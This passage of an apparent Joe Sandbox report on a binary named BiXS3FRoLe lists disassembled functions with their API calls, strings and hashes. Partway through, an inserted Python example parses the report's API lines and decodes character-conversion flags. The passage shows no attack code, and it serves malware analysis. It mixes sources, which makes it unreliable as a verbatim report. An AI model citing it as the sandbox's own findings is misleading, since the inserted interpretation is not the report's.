                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __dosmaperr_free
                                                                                                        • String ID: SystemRoot
                                                                                                        • API String ID: 3116789124-2034820756
                                                                                                        • Opcode ID: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                                                                                        • Instruction ID: af21b90b387a5ca079f66c10d38512c047c2b954186f4a91b3c3c26eb1bd3f5b
                                                                                                        • Opcode Fuzzy Hash: 26816a396a08b1608da1ed8a3902be071c414d4fed28aa2b952470df0a3dcdce
                                                                                                        • Instruction Fuzzy Hash: 25213A326042159FEB289F29DC51B79B7E5EFC6720F2981E9F8459B341C6329E01E790
                                                                                                        APIs
                                                                                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00B3E5C4,00000000,00000050,?,?,?,?,?), ref: 00B3E444
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 0-711371036
                                                                                                        • Opcode ID: c9c35b24454aef4a4119ede3255ea59bf01c9e255e9fc91c1465743efebb10fe
                                                                                                        • Instruction ID: 92716c9c6b4e987fe2dddc0f009ab7e660aebc13f6f95936c17e3075ecd6c326
                                                                                                        • Opcode Fuzzy Hash: c9c35b24454aef4a4119ede3255ea59bf01c9e255e9fc91c1465743efebb10fe
                                                                                                        • Instruction Fuzzy Hash: D421A462A40101A6EB358A648942B9B73D6EB54B51F7A84E6F92AD73C1F732DD00C3A4
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00A7610E
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        • ___std_exception_copy.LIBVCRUNTIME ref: 00A76162
                                                                                                        Strings
                                                                                                        • Clone() is not implemented yet., xrefs: 00A760E5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionException@8RaiseThrow___std_exception_copy
                                                                                                        • String ID: Clone() is not implemented yet.
                                                                                                        • API String ID: 640887848-226299721
                                                                                                        • Opcode ID: ac14e4cafa46fc5e36d6cb0d8169ab0150f072624cadf2db515c4016b9c21f5b
                                                                                                        • Instruction ID: 481bc651075f1be7a5a003acb91cb51182a3197a6db17f5c5f5d378c2d2b82e0
                                                                                                        • Opcode Fuzzy Hash: ac14e4cafa46fc5e36d6cb0d8169ab0150f072624cadf2db515c4016b9c21f5b
                                                                                                        • Instruction Fuzzy Hash: B42141B2940609ABC701DF55C941F9AF7FCFB19710F5086AAE415A3790EB74AA14CBA0
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00ABD656
                                                                                                        Strings
                                                                                                        • OutputBuffer, xrefs: 00ABD5E7
                                                                                                        • ArraySink: missing OutputBuffer argument, xrefs: 00ABD62D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: ArraySink: missing OutputBuffer argument$OutputBuffer
                                                                                                        • API String ID: 2005118841-3781944848
                                                                                                        • Opcode ID: 99fe08689d6f88bf805da00f8ba09cc7bba2a24008b7e9f4885999fb314ceb62
                                                                                                        • Instruction ID: 381972c0009c77d63ea879fdb5365b34517902a4ea80357d9930c75a38ea05dc
                                                                                                        • Opcode Fuzzy Hash: 99fe08689d6f88bf805da00f8ba09cc7bba2a24008b7e9f4885999fb314ceb62
                                                                                                        • Instruction Fuzzy Hash: F1213B71904649AFCB14DF94C851FAEBBF8FB58710F0045AAE815AB6A0DB74A948CB90
                                                                                                        APIs
                                                                                                        • SetLastError.KERNEL32(0000000D,?,00AE5230,00000001,?,00A7379A,00000000,?,00A72567,00B9F6C0,00AAE510,00B9F6EC,?,00A7379A,?,00000001), ref: 00AE9F3E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast
                                                                                                        • String ID: ios_base::failbit set
                                                                                                        • API String ID: 1452528299-3924258884
                                                                                                        • Opcode ID: befa06c357691b25796465ac71b38dbf30f6fe84f698b346b81febf9fe7ab59e
                                                                                                        • Instruction ID: 9b50b12835b613ae9010a609ad2b0bb598dc047b5cb913ee614ebea832f3ef6d
                                                                                                        • Opcode Fuzzy Hash: befa06c357691b25796465ac71b38dbf30f6fe84f698b346b81febf9fe7ab59e
                                                                                                        • Instruction Fuzzy Hash: 46113C32204355ABDF129F66DC8466FBBAABB48B55B014039FA09D7260DB709C509BD0
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00AA021F
                                                                                                        Strings
                                                                                                        • StringSink: OutputStringPointer not specified, xrefs: 00AA01F6
                                                                                                        • OutputStringPointer, xrefs: 00AA01D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throw
                                                                                                        • String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
                                                                                                        • API String ID: 2005118841-1331214609
                                                                                                        • Opcode ID: 277d6168d607a65d99ea736f8803da9a8f62dba7dcd04ae2872d5968a51f6768
                                                                                                        • Instruction ID: 6cae8b6969a7858af525cbc6b02cb814c5c74663d0247f72b1c4b449ed44eb7c
                                                                                                        • Opcode Fuzzy Hash: 277d6168d607a65d99ea736f8803da9a8f62dba7dcd04ae2872d5968a51f6768
                                                                                                        • Instruction Fuzzy Hash: E8017171940608EBCB04DB94CD41FDAB3FCEB09714F5085AAE421A73A0DB75AD048B50
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B157E5
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B157F3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pScheduler
                                                                                                        • API String ID: 1687795959-923244539
                                                                                                        • Opcode ID: c943046126d89fc83dd1223cd39a36ef0048e3758dbdf1affa73738871971393
                                                                                                        • Instruction ID: 954636fd1634059eefea92031d282344c8fba55899ca18fef01abbea11743211
                                                                                                        • Opcode Fuzzy Hash: c943046126d89fc83dd1223cd39a36ef0048e3758dbdf1affa73738871971393
                                                                                                        • Instruction Fuzzy Hash: 9BF0A035A00704EBCB28FBA4D883CEE73E89E8470079441E9E612675E1DF60AE85C781
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameName::
                                                                                                        • String ID: {flat}
                                                                                                        • API String ID: 1333004437-2606204563
                                                                                                        • Opcode ID: 44f45f01f0016189c9a1d20cde38a0d7eea8492690a381bb4f219f21deb378a0
                                                                                                        • Instruction ID: c7ffc8dcb932eb24052b58ce98748e77d4d3e84c404ea001ef0c7ee180b2807a
                                                                                                        • Opcode Fuzzy Hash: 44f45f01f0016189c9a1d20cde38a0d7eea8492690a381bb4f219f21deb378a0
                                                                                                        • Instruction Fuzzy Hash: 6CF03970150208DFE710EBA8E5A5FEA3BE0EB02715F0480C5E94C4F292CBB5E8C48BA0
                                                                                                        APIs
                                                                                                        • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B12754
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B12762
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                        • String ID: pThreadProxy
                                                                                                        • API String ID: 1687795959-3651400591
                                                                                                        • Opcode ID: b5a6636eecbdf28c98f41b72d8d6cb872de064223ed8f0e061acb30f15293303
                                                                                                        • Instruction ID: 773f6ac9252581160875b3916c9a24d0a66f972ac8851b606b6f8328bbdaa8b2
                                                                                                        • Opcode Fuzzy Hash: b5a6636eecbdf28c98f41b72d8d6cb872de064223ed8f0e061acb30f15293303
                                                                                                        • Instruction Fuzzy Hash: BBD05B31E003085ACB00F7B5D806EDD77EC9B00748F4040F4691196051EF70D914C764
                                                                                                        APIs
                                                                                                        • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00B18FB1
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00B18FD8
                                                                                                          • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
                                                                                                        Strings
                                                                                                        • Access violation - no RTTI data!, xrefs: 00B18FA8
                                                                                                        Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
• String ID: Access violation - no RTTI data!
• API String ID: 2053020834-2158758863
• Opcode ID: f63549269b1971608f2b85ac5cadf8350b8f7afd94cf6d25f2dc7807c5ead407
• Instruction ID: a98a3955a8f3b1a40b77951b3e6e04df5d2a11b8c699795d61c047653dfa51f2
• Opcode Fuzzy Hash: f63549269b1971608f2b85ac5cadf8350b8f7afd94cf6d25f2dc7807c5ead407
• Instruction Fuzzy Hash: 63D0C96694420C5A8E18E6D09A478DE67E9EA08304FA008C2EB20A7460AF75BE994B61
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00AABDFF,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00AABDFF), ref: 00B217AD
• GetLastError.KERNEL32(?,000000FF), ref: 00B217BB
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00AABDFF,00000000,?,000000FF), ref: 00B21816
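The "APIs" lines above are the report's own trace of what the function called, in call-site order, with the argument values the sandbox saw on the stack ("?" where it could not resolve one). The following is an added example, not part of the Joe Sandbox report: it parses that line format into structured calls, names the dwFlags bits of the MultiByteToWideChar calls (the flag constants are the winnls.h values), and flags the sequence seen here, a call with MB_ERR_INVALID_CHARS set (0x9 = MB_PRECOMPOSED | MB_ERR_INVALID_CHARS), then GetLastError, then a second call with only MB_PRECOMPOSED (0x1). Reading that as "strict conversion first, lenient retry on failure" is this example's interpretation of the trace, not a statement the report makes. The sample input is constructed from the three lines above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: the three "APIs" lines of the entry above, copied
# verbatim from the report. Argument values are whatever the sandbox saw on
# the stack at the call site; "?" is a value it could not resolve.
SAMPLE_API_LINES = [
    "• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00AABDFF,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,00000000,00000000,00AABDFF), ref: 00B217AD",
    "• GetLastError.KERNEL32(?,000000FF), ref: 00B217BB",
    "• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00AABDFF,00000000,?,000000FF), ref: 00B21816",
]

# Shape of one line: "<bullet> <Api>.<MODULE>(<hex args>), ref: <hex address>"
API_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# dwFlags bits accepted by MultiByteToWideChar (values from winnls.h).
MB_FLAGS = {
    0x1: "MB_PRECOMPOSED",
    0x2: "MB_COMPOSITE",
    0x4: "MB_USEGLYPHCHARS",
    0x8: "MB_ERR_INVALID_CHARS",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows "?"
    ref: int                    # address of the call site in the dumped image


def parse_api_line(line: str) -> ApiCall:
    """Parse one report line; raises ValueError for anything else."""
    m = API_LINE_RE.match(line)
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    args: List[Optional[int]] = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok:
            args.append(None if tok == "?" else int(tok, 16))
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def parse_sample() -> List[ApiCall]:
    return [parse_api_line(line) for line in SAMPLE_API_LINES]


def decode_mb_flags(value: int) -> List[str]:
    """Name the known dwFlags bits; any unknown bits are kept as a hex remainder."""
    names = [name for bit, name in MB_FLAGS.items() if value & bit]
    leftover = value & ~sum(MB_FLAGS)
    if leftover:
        names.append(f"0x{leftover:x}")
    return names


def strict_then_lenient(calls: List[ApiCall]) -> bool:
    """True if a MultiByteToWideChar call with MB_ERR_INVALID_CHARS set is later
    followed by one without it. Treating that as "fail on invalid input, then
    retry leniently" is this example's reading of the trace (an assumption)."""
    seen_strict = False
    for c in calls:
        if c.api != "MultiByteToWideChar" or len(c.args) < 2 or c.args[1] is None:
            continue
        if c.args[1] & 0x8:
            seen_strict = True
        elif seen_strict:
            return True
    return False


if __name__ == "__main__":
    calls = parse_sample()
    for c in calls:
        flags = decode_mb_flags(c.args[1]) if c.api == "MultiByteToWideChar" else []
        print(f"{c.ref:08X} {c.module}!{c.api} argc={len(c.args)} {flags}")
    print("strict-then-lenient retry:", strict_then_lenient(calls))
```

The argument list is positional as the sandbox captured it, so only the first six slots of MultiByteToWideChar map to its real parameters; the rest are stack residue and are kept only because the report keeps them.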
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: fee82ac4ed0d354be6078ad29d0b856412a31d33297ce856c2b0200e6a425b1c
• Instruction ID: 5477f7cebbbcaef20cb67c3ebaaee473b00b6d80b324b6eaf10069b832ef7d33
• Opcode Fuzzy Hash: fee82ac4ed0d354be6078ad29d0b856412a31d33297ce856c2b0200e6a425b1c
• Instruction Fuzzy Hash: 9241DA34900265AFDB258F6CE884BBABBE5EF51360F1545E9E85D9B2A1DB308D01C7A0